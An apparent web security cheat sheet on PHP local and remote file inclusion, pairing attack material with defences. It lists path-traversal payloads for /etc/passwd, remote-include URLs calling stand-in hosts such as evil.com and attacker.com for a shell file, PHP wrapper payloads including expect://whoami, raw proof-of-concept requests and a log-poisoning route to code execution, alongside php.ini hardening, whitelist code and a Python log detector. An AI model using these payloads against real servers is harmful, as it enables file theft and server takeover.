🧠 Description

What is LFI/RFI?

LFI allows attackers to include local files on the server. RFI allows attackers to include remote files from attacker-controlled servers. Both can lead to RCE when combined with log poisoning or other techniques.

A successful LFI/RFI attack allows an attacker to:
  • Read sensitive files
  • Achieve Remote Code Execution
  • Execute malicious code
  • Fully compromise the server

🏷️ Classification

  • LFI: Include local files (../etc/passwd)
  • RFI: Include remote files (http://evil.com/shell.txt)
  • PHP Wrappers: php://filter, expect://, etc.

🎯 Attack Surface

  • ✅ Template includes
  • ✅ Language includes
  • ✅ Theme loaders
  • ✅ Module loaders

🔍 Detection

  • Test: ?page=../../etc/passwd
  • Test: ?page=http://evil.com/shell.txt
  • Test: ?file=php://filter/convert.base64-encode/resource=config.php

🔧 Workflow

  1. Find include() or require() functions
  2. Test with LFI payloads
  3. Test with RFI payloads
  4. Use wrappers for RCE

💣 Basic Payloads

LFI Payloads
../../etc/passwd
../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc%2fpasswd

RFI Payloads
http://attacker.com/shell.txt
ftp://attacker.com/shell.txt

🚀 Advanced Payloads

PHP Wrappers
php://filter/convert.base64-encode/resource=index.php
php://input (POST code execution)
expect://whoami (RCE)
data://text/plain,

📝 Proof of Concept

# LFI
GET /index.php?page=../../etc/passwd

# RCE via php://input
POST /index.php?page=php://input

💥 Impact

Severity: CRITICAL
  • Remote Code Execution
  • Full server compromise
  • Complete data breach

🔗 Attack Chain

LFI to RCE via Log Poisoning
  1. Find LFI in include()
  2. Inject PHP to access.log via User-Agent
  3. Include access.log to execute code

🛡️ Mitigation

✅ Disable allow_url_include: Prevent RFI

✅ Use file IDs: Map filenames to IDs

✅ Validate paths: Ensure file is in allowed directory

🏰 Advanced

; php.ini
allow_url_include = Off   ; blocks RFI and remote wrappers in include/require
allow_url_fopen = Off     ; also blocks legitimate remote reads via fopen()/file_get_contents()

# Whitelist approach
$allowed = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? 'home';          // avoid an undefined-index notice when the parameter is absent
if (in_array($page, $allowed, true)) {    // strict comparison: only an exact whitelist entry passes
    include $page . '.php';
} else {
    http_response_code(404);
}

📊 Monitoring

  • Alert on php:// (and other wrapper schemes such as expect:// and data://) in request parameters
  • Alert on ../ in parameters, checked after URL-decoding so the ..%2f payload above is caught
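The two alerts above as working detection logic, added here as an example and not taken from the original page. It parses Apache combined-format access-log lines (constructed samples, not real traffic), URL-decodes parameter values until stable so the encoded and double-encoded traversal variants normalise, flags wrapper schemes and ../ sequences, and additionally flags a PHP open tag in the User-Agent, which is the log-poisoning step from the attack chain. Field names and alert labels are my own choices.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Apache "combined" format; only the request target and User-Agent are inspected.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Stream wrappers abused for LFI plus the remote schemes used for RFI.
WRAPPER_RE = re.compile(r'^(php|expect|data|phar|zip|file|ftp|https?)://', re.I)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')  # "../" or "..\"; also hits the "....//" variant
PHP_TAG_RE = re.compile(r'<\?(php\b|=)', re.I)  # PHP open tag in a logged header = log poisoning

def fully_decode(value, max_rounds=3):
    """URL-decode until stable so single (..%2f) and double (%252e) encoding both normalise."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a list of (reason, field, value) alerts for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return [('unparsed', 'line', line)]
    alerts = []
    for name, raw in parse_qsl(urlsplit(m.group('target')).query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already removed one encoding layer
        if WRAPPER_RE.match(value):
            alerts.append(('wrapper', name, value))
        elif TRAVERSAL_RE.search(value):
            alerts.append(('traversal', name, value))
    if PHP_TAG_RE.search(m.group('ua')):
        alerts.append(('php_tag_in_user_agent', 'User-Agent', m.group('ua')))
    return alerts

def scan(lines):
    return [(n, a) for n, line in enumerate(lines, 1) for a in inspect_line(line)]

# Constructed sample log (not real traffic): a benign request, then the page's test payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://evil.com/shell.txt HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
]
```

`scan(SAMPLE_LOG)` returns one alert per line 2 through 7 and nothing for the benign first request; a line that does not match the log format is reported as unparsed rather than silently skipped.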

🔐 Security Controls

Control     | Implementation
Disable RFI | allow_url_include=Off
Whitelist   | Use file ID mapping

🛠️ Tools

  • LFISuite: automated LFI exploitation
  • Burp: manual testing

🔄 Retest Steps

Step | Action
1    | Disable allow_url_include
2    | Re-test with RFI payload